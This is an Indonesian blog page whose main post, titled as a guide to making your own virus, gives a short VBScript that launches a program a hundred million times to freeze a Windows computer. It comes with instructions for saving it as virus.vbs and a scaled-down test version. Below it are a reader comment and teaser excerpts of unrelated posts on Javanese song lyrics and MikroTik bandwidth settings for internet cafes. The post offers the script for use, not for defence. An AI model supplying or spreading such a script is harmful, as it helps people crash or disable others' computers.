Skip to main content

Membuat virus Sendiri dengan mudah

Membuat virus bukanlah merupakan hal yang sulit. Karena, kita dapat membuatnya dengan notepad yang terdapat di semua komputer yang memakai Windows.
Virus yang akan kita buat ini, adalah virus yang membuat komputer yang terinfeksi menjadi tidak bisa berjalan sama sekali.

Let`s Begin!

langkah-langkah:

1. buka notepad
2. copy+paste bahasa pemograman(yang bercetak tebal) di bawah ini:

option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next

untuk mendownload scipt, klik disini

3. Save notepad dengan nama virus.vbs ( pastikan ”save as type” diubah ke ”all files”)
4. Ingat!! jangan klik file tersebut. Karena komputer anda akan dipenuhi oleh 100000000
tourstart yang akan memenuhi layar anda, dan akan membuat komputer hang total
sebelum anda mendelete semuanya.
5. bila ingin mencoba virus ini. silahkan membuat ulang program, dengan perbedaan
ubah 100000000 ke 10, untuk percobaan. maka setelah anda mengklik program.
layar anda akan dipenuhi oleh hanya 10 tourstart saja.

Comments

  1. ada antivirusnya ga? atau ada penawarnya ga untuk virus notepad ini

    ReplyDelete

Post a Comment

Popular posts from this blog

Caping Gunung : Lagu jawa legendaris yang penuh pesan moral

Mentari terik bukan alasan mengeluh. Burung pencuri biji bukan alasan mengumpat. Tinggallah seorang diri, hening, terbelai tangan-tangan halus sang bayu. Sambil mendendangkan ini lagu…

Dhek jaman berjuang
Njuk kelingan anak lanang
Biyen tak openi
Ning saiki ana ngendi


Jarene wis menang
Keturutan sing digadang
Biyen ninggal janji
Ning saiki apa lali


Ning gunung
Tak jadongi sega jagung
Yen mendung
Tak silihi caping gunung


Sukur bisa nyawang
Gunung desa dadi reja
Dene ora ilang
Gone padha lara lapa


yang artinya:

Ketika masa perjuangan
Ku teringat putraku
Dulu aku rawat
Namun sekarang entah di mana

Katanya sudah merdeka
Terpenuhi apa yang diinginkan
Dulu dia berjanji
Namun sekarang apakah alpa

Di gunung
Kubekali nasi jagung
Kalau mendung
Kupinjami caping gunung

Syukurlah jika dia bisa melihat
Kini gunung desa makin ramai
Hingga takkan hilang
Kenangan dulu ketika susah Lirik lagu Caping Gunung, ciptaan Alm.Gesang



Konon lagu ini oleh pengarangnya (Alm. Gesang) merupakan sebuah kritikan s…

Setting Mikrotik untuk Warnet Game Online dan Browsing

Telah sering, warnet-warnet telah memakai router mikrotik. Banyak owner warnet yg telah menyatakan bahwasanya dengan memakai mikrotik buat jaringan warnet game on line itu efisien serta efesien buat merawat omset serta pengunjung warnet game on line mereka, meski tdk menopang 100% buat kurangi lag di game on line. Mengapa saya menyebutkan tdk 100%? dikarenakan kembali lagi dari mutu jaringan internet provider kamu (ISP) serta jaringan lokal warnet Kamu. Lantaran perihal tersebut kita juga di tuntut buat menganalisa jaringan lebih jeli.

3 Argumen Warnet Game On line Memanfaatkan Mikrotik

Piranti Router yg harga nya terbilang murah, kemungkinan kamu telah tdk asing dengan mikrotik routerboard RB750 serta RB750G atau harga yg tidak berlainan jauh di seri terkini RB951-2n yg ditambahkan Wireless Built-in. Irit tempat serta konsumsi listrik. Penyusunan serta monitoring bandwidth atau jalan raya data pada kegiatan pencarian, streaming, download, serta game on line yg enteng oleh…

How to limit video streaming,youtube and idm connection with mikrotik

Cara limit streaming,youtube dan koneksi idm di mikrotik langsung copas script ini di new terminal mikrotik.

untuk layer 7

/ip firewall layer7-protocol add name="Limit IDM" regexp="get /.*(user-agent: mozilla/4.0|range: bytes=)" add name=http-video regexp="http/(0.9|1.0|1.1)[x09-x0d ][1-5][0-9][0-9][x09-x0\ d -~]*(content-type: video)" add name=VIDEO regexp=video add name=AUDIO regexp=audio add name=donlotan regexp="^.*get.+\\.(exe|rar|zip|7z|cab|asf|mov|wmv|mpg|mpeg|\ mkv|avi|flv|pdf|wav|rm|mp3|mp4|ram|rmvb|dat|daa|iso|nrg|bin|vcd|mp2|3gp|mp\ e|qt|raw|wma|ogg|doc|deb|tar|bzip|gzip|gzip2|0[0-9][0-9]).*\$"untuk mangle nya

/ip firewall mangle add action=mark-packet chain=prerouting connection-mark=video \ new-packet-mark=video passthrough=no add action=mark-connection chain=prerouting layer7-protocol=AUDIO \ new-connection-mark=yutup add action=mark-connection chain=prerouting layer7-protocol=VIDEO \ new-connection-mark=yutup…